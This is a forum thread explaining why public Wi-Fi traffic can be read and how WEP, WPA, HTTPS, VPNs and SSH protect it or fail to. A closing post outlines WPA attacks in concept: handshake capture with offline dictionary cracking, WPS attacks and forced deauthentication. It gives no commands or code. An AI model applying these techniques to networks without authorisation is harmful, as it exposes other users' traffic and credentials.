Wireless security issues doubt

[Techknowledge]

I am told that if I connect on a public wifi and then surf the net, I'm not really secured. Can someone explain in simple English why and how? My understanding is information is on the air (i.e. using wireless to communicate) and hence there are programs that sniff these information (can someone give practical example that I can try and use these program to see how information is readily clear)? Second question is, how then should I ensure the information in the air (wirelessly) is encrypted? I believe by the use of VPN or SSH, but again, if I have neither, how can I ensure my information is encrypted from sniffers? Lastly, by connecting to a VPN or SSH, doesn't it also mean my computer connects to a VPN and then anything from VPN or SSH is secured, what about from Computer to VPN (there also information is on the air right?) so only once it connects to a VPN and information becomes encrypted. I would appreciate answer of each of the questions and doubt to make it clear for me Thank you

 

[PrincessFrosty]

Different types of wifi protection work in different ways, so it depends.

WEP uses a single key to encrypt everyones data and that's based off the passphrase, if you know the passphrase (or there isn't one) then you can simply read the traffic to/from anyone connected to the access point. WEP is even more insecure than that because you can find the hashed version of the key in just a few minutes anyway.

WPA is slightly different, each session is encrypted with a unique key, that's built partially from the password and partially from other data including random data exchanged when you connect.

If you have an open WPA network or you're sharing a password you can't simply read other peoples traffic, you need to know the other information that is used to build their key. If you capture the handshake of a person connecting to the wifi however, you can use that handshake with along with the known password to find the session key and then decrypt everything onward.

VPNs and SSH typically tunnel data encrypted across a network (any network) and could be read on an unsecured wifi but you'd just see gibberish unless you knew the encryption key the VPN was using to decrypt that with.

There are many different ways of encrypting data on the fly, it depends on the type of data you want to send/receive, for example HTTPS encrypts web traffic so if you want to use a public wifi simply for surfing you'd have to make sure you browse sites that support HTTPS.

VPN tunneling is usually done from the physical device as the start point and ends at a provider of some such, everything along it is encrypted, only from the exit node of the provider to the destination is left unencrypted (by the VPN).

 

[Techknowledge]

Excellent info. Thank you

 

[PrincessFrosty]

It's worth noting that WPA attacks are possible in the wild, they're open to offline dictionary attacks where you capture the 4 way hand shake between a client and the access point, any weak password in a dictionary table will be found.

It can also be found via WPS attacks if WPS is enabled.

Once you have the password you don't have to wait for a client to connect to grab their handshake, you can spoof disconnect packets from the access point to the client forcing them to reconnect and do another handshake, so attacks like this are very practical.